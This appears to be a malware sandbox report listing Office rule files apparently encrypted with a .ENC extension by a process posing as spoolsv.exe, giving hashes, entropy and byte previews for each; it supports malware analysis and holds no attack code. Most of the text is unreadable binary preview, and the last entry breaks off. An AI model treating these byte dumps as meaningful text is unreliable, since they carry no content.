                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.y>. y...G.......J....O.....jNg7.4...L...)ZV.........H..1C9.f..?Xc.._.9E.6......"..O.aKC#}..R..@H..G.t_.v.. 3i.QQ.4..|....QJ8..L.....D...bH.X|;...............2..*....a...,C.Z...'.]jx9...|D...Q..qd..w.m..M.2..J.<Z.o3]1...w...w..m.I..j=h5..s ...).t..5........].j...B.S.%h35.....].H...5....g?<....T\.....4f.JZ~..._.W2`...*|a....C......e..U3.......2. Tp3.6L=.}.O..n.......U4~'4.....V...9l.....\\e..p^..*I.....1a?="../....R.o.a;:..rPR..Eio..D...~...1.!...s!.o...4....IM.k..^M..P=i...&.[6.`.s.s.h.F.$.1I/k..M...!.#..dn7yz. U3r.o$^Fp.0...}k&......"O......5....=]........|...1...4CHJj..d.`.q].|.....".M.......Y..k..E..pRX&.......pi...tQ......>:..K...6.J!..x\...$)W.+..eI.f.h..I,F........qPy. $.~..].*....#N....:.....3.m.KZc.(W....g.G..c..C&.e.=.NR.O3\..&R...CP...oD.P.n....?'.`. ....:T.&V.W...F]....%..kT..4.l....L.\...'....uJ....Sf@..l.i)....g.s-.5J.'...z..1.70...zc...P"\.D)P6...Q.m`.w...%..I........N.#..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10822v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4464
                                                                                                                                                                                                                                                      Entropy (8bit):7.958072704925796
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++IdczDJBs+4+UIUHgh8sL+ySylvJPWfow9BrGjesxBsZiW8C:++wYDJmIUHgOsidyxJPiowHrGjxCZiWP
                                                                                                                                                                                                                                                      MD5:38AC8B968BD7C6159A767995964A31CF
                                                                                                                                                                                                                                                      SHA1:E2927600950D7DDF83E7D5E9698909995EB1BFFD
                                                                                                                                                                                                                                                      SHA-256:9EAA8649E9490D10784F2EE1EC3FE5AEF1EBA27219A00B5468B52B263258B44C
                                                                                                                                                                                                                                                      SHA-512:E20F56421DA404635C51454C3F8B4CB8C32B1F4E06DDDDF8ED801975150FF7453AA3C3B8BC702E84C8E9836ADA67A6B8CA63F504EEAD8E9648DBD5D89A608600
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f....b..4>..*.D{s8....P...I.;.....4JC.g..$..}..n$.....E!.F.7...{.....5.g.]I....^h.1..p..[..R..[...?b..Z~..2.....E.d...Ew5..N...Y...5Z.h...6.8D..gP&j(...~...DH.U(........Q...n...s..P..iF.W{....{..U....F.*;........w.^........|.....C..W=...t..L2[&.R!.4...5.'.o.x.h;..3..I(c. O.'..._!Ohj........Z!.p..*.Qn.j..xj.}...M&c Uv..`.d....N2.e.0...8Z........;z.N.Z[...}.....;.....}Z....@...:)"./s..Zp.mfn...p'8.V.....P"c............+.......^.h..'.J.xm.....@vV.oRp'..?/].\.n...`.....!..l.lRu.>...t_.']#d.K'.ts.- ...w..$..7...a./H.n...r...`..yu.D..6D2|.~...D...y?..W.4...4N.Py_.........\......7...G4.......,.h||;....]S.np.#..D10>.........*.A)9$..B.3.#..Lf......;..?.yb.0e......D3<..G.>.sdC.!IN..t...(.E..u./Xh`.K]...".0F.c..u......b.r..-}.1..exV.Wowt....Xc.$^...('....j. .>.Sp..G......p..;`....l...7.%.a.7.....`...j..]g....V..~...eR@>......l6...F.....g.M.k....U;..."..._..../W..!.K.([.UDX....L.r..p"k.q(..+,.O...4.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10829v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2704
                                                                                                                                                                                                                                                      Entropy (8bit):7.930061899748449
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++HFk1ilhLbBd6PlBjMzqLrV0qX3jHXWleRAVSH+3smgXSEA/4RQuLq8:++C1i3HbsFLuqXLomGLMSEase8
                                                                                                                                                                                                                                                      MD5:DBA35E7E3742DEEC5255834564167C86
                                                                                                                                                                                                                                                      SHA1:AE9E32889381983016E7C77B7EE1B4E10BB7FD75
                                                                                                                                                                                                                                                      SHA-256:5298501B9102E83182E2902EFEDDBF484901830225BE82FAF3C1652AD81A6FEE
                                                                                                                                                                                                                                                      SHA-512:5793F6C414FD5073F751A94FFE90EFF643650A617A88AC34ED9F344327F0790440F877742672540CDFFEE5D53592D390923AEA87A14B6AA87BA27F16AF4153DD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f....M..B....C\..Q=.c.t..4.d}^.....`..LB.........0...('.&.I....(i.DP..>.........../....H+..:....N.@.\..._.1.5...y.9(.u..^.h...nx...6.A*3H.t.6.....x.8....B+.mE&.....P.B...2ey7.R.^.&.Yf.u7<...M.$M.: ..6..?N1&^..OUs.2..?.0*..d.B.......<...*.I\._.U.`b...j-.AN..g.B.#.\.&L...x2yH.".SL..1.I.sm..N:....R.~X^+.Y..".M.ci.H..}@..d....0|......Xw.Oy5..........p.'E..16.!.<G...#w....a........z...,...W..q...+..c....#.M.Zn...|....!..8.E.].c...0C.^.9vq..9........V.>.2..jY...!^{.+...2....z&R......1.E.X...?..r....qr....L.c-C.qf..*R....K..s(....K..W.U9K.4..e...B.M?.r.V..JN.=n....Am.,)...p%.b..!.SS.....V..'"..Z.kc....P...D..c...t..!.s...p../....+.y..@j...b..Z.......c..".QV.9.w!DA&.&.qt..H.L...[x.W.....B...cj...............V..$...>f..........?....o.4..(.l..,@.M.tu.f9rx0.0}6.,.X..+...o.=7.I..c...w....k........4..l...J._..f..)...n'.... ..,AF.UG.C;.Z...V.d..E.\'..-t'..4........d.......J....N...nx+..i.....x>Uj..O

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10879v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):464
                                                                                                                                                                                                                                                      Entropy (8bit):7.5723183550790365
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:fmcorOJ77kOF6GW0Q+Fr0NOd6afot+kYymkQZICcnn1X1qGpAbYzKZDGRlLS98x:fmZaJ7Ngyr0Adnfot+hym6hm8OZcLS9S
                                                                                                                                                                                                                                                      MD5:5EA47738BA1C5CB1D1C1B9DCE02632AE
                                                                                                                                                                                                                                                      SHA1:B51EA615B7E6F9AB66D637ECFD393214648AF504
                                                                                                                                                                                                                                                      SHA-256:EDBAB72231692D3A79205DBD05E921E8FCCD2610CC25D0F03BCEFF4A06C9610A
                                                                                                                                                                                                                                                      SHA-512:13E2A639700719C898C36449B47FB4E1483E91C532E922E5B908AB39ECA5C7F21E5D97FDA4971E58F519084189AAB434C0B36B941018778E7696915483D97A72
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fP)..*..>........~{.....h......t,...~........f.5(...|......E...&B6.....*.....[. .Q.....JbD.f.Z}.$f5a;..j?...gg.jn..h.0.<...-20SK............>.K2..wc..m.(..k..#.qBg.j.%.1.....\$...V2..R......D...d]jq..-J3h#Q.a?......m._!`..EC..H.q.d....HP...c\Wne.Dy.u.. I....z.....>.w.l....AG.G.QLa^."(>,ur'.!3-....."z.....V...E..h......j.(.N.on.k.....gi.cgA..*...ZO'...0......6<....:k.-W.b.......@..7.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10880v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2688
                                                                                                                                                                                                                                                      Entropy (8bit):7.933220478139271
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++Gfz3oMcifHXYBTS1dUxfZ0IT0eKgmv97t0soRxOMXDgpL9eLvBG18:++GAsHXYBTGYZ90eKPv9p0SMXCQpG18
                                                                                                                                                                                                                                                      MD5:7F63907485164E96C799ADF07625B061
                                                                                                                                                                                                                                                      SHA1:31F404E8783EC7F41E253D4E442C901A82580226
                                                                                                                                                                                                                                                      SHA-256:FDC1EC2136B8F0E83B2A3628B365E6558E6C777D42D53A5E166EF84291A9A4DD
                                                                                                                                                                                                                                                      SHA-512:A48305ABBA306858645F20A87AFD7751510F0004024492AFD2FA9803B6103368375D00EA11C049128EE0AEBEFDB40493012EDCE4F563D3C7A935C002690629EF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f*e8.W._..s!.p....gs\..b}[p...=..d..v...6._......V.F..og..[..-...]^...,.X.X.....y......M....zT3.........Qk.1J...J..IY.............GUk...I&.d.?Y.'.[....nC.-..cp.....%97.)....}..Jw....9.l)d.g..|..r_..i.*9...vdB.`..I.x.i..o.z.i.._^.....b...X._NcqB![C=.....om....L..k'.k.s..o...b..<.U....,.a."...R.z.....5...+.D<...5...v..Y6.....5......r....1.`.:k..W...z.....w..X@.1..IL,.i.K..SgGZA...nqKl.q\.6(.*.D.,.J...D...l.U..._.....'S.@.....j.@'...k..)..\...V....r.<..`....+......o`.i......J...t..I.A..ug...\j.b.j.j..S...\..d.....a..a#......'\.P..#O.S3...^._@:.7/L.!...t.7.z..E..........;.........?.OJ#..7-.....M..*?......$y..|..Z`..i...QMY..Am.&T..K.$D....7...r(....@.<.L....q..Fp.HhTM.......B-|.2.!l..c...XB.%...9.xL(....u3<<.....>......wt....2.YPO....i4..\=.S ZL.0..b...0.d.#_|Gy.t......QO.(9/.1.[.i.{1......p.&.I...4y......{]....M.Z.V.=Z#9X.......M..r0...l.....].Y.-.[[.?...,...Q..*..B".P.f.:6.Y.5..?.5c.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10881v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.585188506233155
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7jv/e5QE+6iDu0kQUJ7W2AIBPg5UqwE/ZSnr+J9sfpmJWV:++nv/Qf+6Qu0+WXvKdEICJ9CpmJWV
                                                                                                                                                                                                                                                      MD5:0622623CE6B3FF820ECD529EA4007F12
                                                                                                                                                                                                                                                      SHA1:763116BE03CFA03D32A021842A6A2392CDE5E2AE
                                                                                                                                                                                                                                                      SHA-256:3E651EDE1464D801C5C47CA5528189A742BC319CE94A371225FBF0781CDAF07F
                                                                                                                                                                                                                                                      SHA-512:2305921019B51A8ED22DD96EBEBD6DB73FE7B9A4A8E078F77FE9456A5EC57D04E2C6E49FD505A49C852F5C6D476AF1E84ADBBA009C4E0867F52B9C022F83FFCA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fe.h,.>...9...S.....Z."....5.../.*...;.q....c..?4..o}..ZK..}......y.X.....n(.j...}.HP....G....`.4.A...X0.i.I..w.'..*..+.;.j....Q...@"...N.i.\].$.J.?-HkeF..$$+W?.......T...F....m.......Ag..U9.7X...*&..T.&W....eQ.I..S..Y../)..X...Y.(...u+@..k,GY@|{........<r.'Q.9...xD%.d`.a....Eq.}c....n:...RgIu1...TTE"...H;...j....}....GB..zF;.m.NlL..4.%...h.I....#........yI.....G.HTIz../...o.t,J.M.U........DR..7.....W..a...SP.L...*.4.n..:.yp

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10882v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2688
                                                                                                                                                                                                                                                      Entropy (8bit):7.934458284898365
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++7XXTn0amilR45+8IjnLXakLSUn3F5K9gGW5qrGq3:++7XXTn0amR5+8PkLS6zxcGo
                                                                                                                                                                                                                                                      MD5:C233F0C46D711816A7034FDD5BA6E5DC
                                                                                                                                                                                                                                                      SHA1:2C3E5864FAFA55FDFD0A0373F7BF60D466B41648
                                                                                                                                                                                                                                                      SHA-256:FBC57B9C06DB4CB8A862B0139FE3E8A88760A9E292078E6E9FA842E0ACD3377D
                                                                                                                                                                                                                                                      SHA-512:9DBF54D557189297877225049F8967A16FD311E29287651BE4CC1473C083E5C077CA33832253D30B4D1AAF0FBD4B832444626FB57C2FFCCEC58CC06106D45333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fg'(,Q9u..-..le......X.[..:.0.9..0..P.<...u....~..i8w..e.....H3....s..........Y.;'..TV=.:..LY...67..v..+&I.va......v. s..#.[.(.s.O..x.[....[..c.O.A.d...9....H..#S0...a......~.........G-.m:....D./.x-2K..f..#..A./R(...|:..`...qc..d./...:HQ.zt.*fH%...g....}....vg..3uv.-!...s?[.........V..."...._.r.-.r.....u.6..8..q.P\...yu.../q.......E..=ch]f.Rh...d!.....E.X.... Xx..L....1......>.7.....q}..u.%..t.+..o. ..M.a..C........w..k..M~.{g.cGUyV;......X.Ki.....+.U..."}..$jv/..{..v6x.=m(.]..K.:...@ae...F..?..7....*.....~.J`.?../\.?9N........_M!.@.T...>. `...W|....|..2.M.R.....[...<...IXoqTa....l.d$.8<.._.,%aS..o.#~5.5\<f$.(.../Ti...w.S0dG...7[...|p..&..|.?..J ..h..]..Wl..fR.=..Y.E.......v@-...h.9....g.4u..&.r..P... ..M......:l...*e..]..'..h.A.......>.'...x'G..8.3..K.=0.A......'($..-.x..F..'..y.yQ........4...,...H\..`.k..#5...>.:..x2P.Ot.R......r.6..;.....WsvR.r|r%..`.N...T.=.v.pu._V...^...e..s.R.L.r.>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10902v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):688
                                                                                                                                                                                                                                                      Entropy (8bit):7.662871299489682
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7AzPfsxqndUl7XgmRPrQRQaVmFKAvHKGzETI5h6qiiU:++sP0AUlDnTUQaMFKOqGYI5h6qiiU
                                                                                                                                                                                                                                                      MD5:62EA089AEAEB8910C5ADF27975014734
                                                                                                                                                                                                                                                      SHA1:F2B1D05E3C81AA6743DD94A08C0E695F2984D6D2
                                                                                                                                                                                                                                                      SHA-256:BDBAD814A81D16AB59995E6299120D26F899B503A529FEC9BB8A6C62DC175453
                                                                                                                                                                                                                                                      SHA-512:EFECA4C48953CA285D15565A8DEBC08A50EB29FDF8A560AF3D8BDEBA7939400D1988F9661A9711FF4430BABDD42D9626CA94E3B25F892167276396CE5032DA78
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.bp..Q.o.qC.X}"...<q.S_u..*0.mC.-^....K....3...Y....:"]...@1@J..Y....b....'-....W6..t..4.V~^.R.<....;m.4.0U..r.~!..{..[M...c.h...<...#...L(..]<......@.?\....2P2*..U.Q...G.c>..f.V4.M.Q.#D....6S..m..]i.!....6.Cs4.D....?.X..Y...w...+l..Lke.0...K.V.....*..{....+...~$B*...J._..^..:..PN.\^....@.3..&.....'Y.U.....qO\.|....DR..JX......&..S..q..gY...q..]..x.^.........o?.\.O.8...._T..o......(...Q......"_.......^2&3l:@...G...u,..2X%~...Y.b...%1.K...w....y..\.u..b..:..sK........UUu.........i...r.Wl.....<..xT.r.w...]~.k2~../....7A...o.T....I.....G,e..`........@`.*......_../O...t.0..R..g.....(.&&.)...4....:_mu

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10906v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1072
                                                                                                                                                                                                                                                      Entropy (8bit):7.814241988594746
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++FKPyxs/F0ZdeUL3feVaA6Xqv6dwqWA47+J6cTwHjENcFW0X:++FKPyxquxesA6Xqv8WA4yxsH/W0X
                                                                                                                                                                                                                                                      MD5:2A621ECDF9FDD1A842254801F2FC85A7
                                                                                                                                                                                                                                                      SHA1:3C22273969D4EBBE1643F22411A7DE5A9AA65412
                                                                                                                                                                                                                                                      SHA-256:6FB13995FEF9F8E4789A625F3922CE0EC5E76392394A70B00DD884640629C928
                                                                                                                                                                                                                                                      SHA-512:3F9CFFD6B58857CA0C6030484171CABC540527F6B6B24E963E2A217AA0972B9CADCC6B9CFB93B00A3004051B5CA9E7B98B00C34348919DF952D9AD5BF4E13736
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f./U.x*$,...|..:....WF;.9t.?....z.|-:=.f7...qp..O..`..7V/....U..t\...=..r..i~%.!.A.g6.........".q.?.h.j~.v.....V.0....h...B. Ly.o....Y.=.T._..F....v.g/.j.. ...$..{$.k.......C..h...$......j..g.6...Dam.....w.:x.l..NZ.A..QI..k..W....P_.j!..p_..Fh@..?1(...|...9m..9..-......?i/...c...i$.....4...s.p6.h..5k.[H.lzk...........Y..V... .0K.)Q2.k.t..9.f......0..g..YS...X..........LN..D2..8....l. x5T.F{...(x.:C.-..........<....|...3..I.-*?.'..S.f.j......^..Sl>..X.<...DJ....2.R...Q...Z..D.d#..1?(..O@..O.]F/.....2...b.Z.%FD.].S...UN5:...*m....+..A=|.33B.`....>.+.&..CnQ....4C.{(Q..Z0.W(..H......?.R..s........m.FQ.k..g[.mI.>puu. Q.Q.../.X0..c...}.&.........0bkw.(.fT.=....`.B7.d.^i.N&..Z..7j.I.x..G".7.1...?.Z....A..e.k.m...B].7...~v...,.<0x...x......D\H.?.QT.o.cA.[.)QyQ.,.b18&-.Y......3.}vL..RF...)..,....Ci.u....f.~.....}1.g...X..'......).\.... .9...>....q...x..<<ip..8...78.....u..P.U.Y*....s..tBX..F^h.F[2r..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10907v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):608
                                                                                                                                                                                                                                                      Entropy (8bit):7.647467772353447
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ76T1/qbjMLy8uRk5YAJfbB9rqCUrd+W5WmbNKSdoAoRzmY//QjD3:++eZqbI1usJbB9rqC0nbgS+KSO7
                                                                                                                                                                                                                                                      MD5:6BCE745922B75D695ECA3B8FA9F5DC0C
                                                                                                                                                                                                                                                      SHA1:67636A321C9E4A535579C9EED03391711D35D5FE
                                                                                                                                                                                                                                                      SHA-256:9B1672FC7E1A0AEAE9BF8958E7DC4295FA0CC3AA461AF09B100BFE1D628E5B5A
                                                                                                                                                                                                                                                      SHA-512:83295DEE19165C67886E1BBF5AB22B08F7FCF3164D717847A40E165A6258F6EC29F45682EB31D50186F7444890580C9C71D49E5C51CA01A6F2E36E8768FD751B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...nu]....&W=.:..........................,[..F...X...i..: RO..k......4.V........#.._P..k...`sC.......-..)...&H...i.vx.pa...5...\.i.../....A..%..@..Hcz.7t....0..~.O.&.....$...i..k.........w..~.......C.T.......,.BKp.=.b...=Cq......vdIFg[.3c8...<.%.".d7S..8...p,..>..r....n.>..._.&.hQ`..2[52V..:gM.Y~.x.B....2oI..4.PBHB....,..o|.......B...(.....R~".B.Lf..+..^l.G..I...;...Q...mRE3&..5....Rj......mE.|........)p .w......(..f...D)...Y...{S&?....B.>| C...+.=e@.......%...X)..?.`T48j.=........~........:.0..T..+.J...+.U R..ZJ'[Y@2.Ia}....b..q6

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10924v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):560
                                                                                                                                                                                                                                                      Entropy (8bit):7.641190814473467
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7fMvZc/gZXqSgAW2hDXHVxvujXuTg0amWbCbsZ8BCQ:++8q/gZXbWoXHVFTdWbCbL9
                                                                                                                                                                                                                                                      MD5:E2E5AD70B86C3ABEF2BF3640596CFB48
                                                                                                                                                                                                                                                      SHA1:111B805A4D21D43CA418F70FF892B1D2BCDC9D80
                                                                                                                                                                                                                                                      SHA-256:93B1848D1D0B6D4D0E73C42E73816A5FE6CD4FCCF8F52A5F0A104F960D8EC16F
                                                                                                                                                                                                                                                      SHA-512:8413ECE6C5A1A822848EB29A75A69BE92A53D6E864E664789EACB890C385F9644A583625716191B3502365185D7956ECBB971A2633B043AF7DCC1B7EBCD432E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.`........2....9.9.....P..:8i`..........u....7r@^w.......;;H?. .o./&.\Z...xzl^Kx......2.[.].]Ekl.n...P[.........s.*.Kkeb......^..i.[.*j..6W.......>.w.....{.....5.zt.G..8KM..I...9PS......>...d..d=...aFHe.b...(.%..C..V......+B.-.u....Z....S..z9A!...e.e....@.A..6.K..H2.....G..o....4.P.....m...0@9X...B.<i.6.z.1..K6."..s5...}..\?..:..XU..1#.:....J(.*.Ra.N......!.~.x.^S...........{ifc....O.(zj....-n...R..h.?...F..R...v....h...QR...Wx..9!L....Ug...3...J...........f.^L....f..L.)...b.X

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10925v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):720
                                                                                                                                                                                                                                                      Entropy (8bit):7.7294657626011745
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7BActKixLQJAeIo8vtDZozMEaX8l/EtTS0eyCIx1dqpzyRMB8mpaZbO70pQ:++a7f8vboI3XgstW0euyYRMdaZbfNMB
                                                                                                                                                                                                                                                      MD5:CDCFB65238AC9309492DDA2406F0C12E
                                                                                                                                                                                                                                                      SHA1:D6A18CEE8316A089C09C305C680748CE0CACD42D
                                                                                                                                                                                                                                                      SHA-256:475C1D114F451416780F5AC38C6CE8475A2DDFE0FCF197839651A47653525C50
                                                                                                                                                                                                                                                      SHA-512:178C84AF63ABA57ACA8D4DAEE2A7934CE938E8A0F822D8EE1DB6759FB9C886D3CDF01DC1F3716A43BE637A1DE12A466C29E50C3C027F4D815B90C85AD0249FCD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f4W....~.~(>\..v"H4.....L.Y..,_.rr..F.cPF....[..a......Q./..GG....&..o...8"h1./.E.2.K...f.#..(.....u..M.(...t..CY......A..S)NAN.C...pf8..A...EZe...4...:S.o...[.u..L.....if....)4..op..n[..<cF.P.S.(...P.B\....,...[..,k0..+@,2_h.......RE.l...rY.....Hk..rY\.+..S]5.3.dG...gX....xsVp.!..Yq..|i....t..w.]..P.."...M.....w.DF.d.....d...H...(...P....<. .L..Q;-.:...d.o.G7.c.w.H.A.PK$qa4..$=x!C.-. V..<....WkTw...}..*y..?.|.E....%...O.8...x.H...f.h>.$:G..Q2.:Q9....|8..Z|.7a.>...|....$.J.6.1....../.H"=...k..7.....c....M.........\........$u.9..j.m....(..n.....b.@...E....i.<...a.*..........u..M..~..&..S..Y....YL.....5<L...[..k/...o.ir.L.9.0T%u.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10940v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):560
                                                                                                                                                                                                                                                      Entropy (8bit):7.60190638012183
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7ZplqGWezpX65zEMdbVCT3RxVmuG51D32XxXqA5b37u9L6qTgZJBAjevFP:++UG1lKgMHCT3Rx8uG5Zcg037S6MeNP
                                                                                                                                                                                                                                                      MD5:32E63815DA12742A79D025766C182F54
                                                                                                                                                                                                                                                      SHA1:A95020B129B8D0D264E6433BA9B3F06F69F62AAA
                                                                                                                                                                                                                                                      SHA-256:923C6773261FAB508AFCA6DA7E1B536B88FCB7D71B8785DC0AA81866357A7F1E
                                                                                                                                                                                                                                                      SHA-512:9716802FB7054EA775EA472FED63CCA9AC13510FC6A5BB95477517015090DF9B51B5A9A2A9F4A342F003B4F8C97AC44FBF2FE298683C51B9CBDB233A448BE9F0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..}......9".y.....OI$.f...1.....{S!{.U..P.`x.E.[U.w....,.....*`i.....f7.=sv.K..s8#..5!U.$.R..5.9...p..e>o....\.E0E.u)..~..x(n.N.v.=b.......~..M..p.9....Z^....Dh....^`....[....2K..3r.Z.. .TW.DH[......W.qj..e.D_OU...\.6......-.iw..(2..xk....J..e..ri..%...7.R.=H}..)&....u...*.@.1.....K....f...C...Ol3ce.XKb...t.d..?9.ESfrh=0...T}`;....s..ts..Q,...u....$.DngQx.........S.O.hH..Z....7?.B...Q._Z.uS..u>.."..5#..q..t......'.m.D.+.3.x9I.....1Q1..Y..>:qZ....?.....).K.[.t.V.....mc.. ..z[.........nC]

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10952v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.980860080122563
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:++gfuE0DhjK0EINk24LVImMt2ClD0ZacgIheoo:YufcyUVImMgCloJNhY
                                                                                                                                                                                                                                                      MD5:9C849BEDF09DE700F655E761EB1AF18B
                                                                                                                                                                                                                                                      SHA1:25B08DD794175692CFBE1E36F7CD831E6752B249
                                                                                                                                                                                                                                                      SHA-256:BB7AFB5BAA6DC0901120510FBA309E6281CD3CDD610FDEB189160A1B0C530267
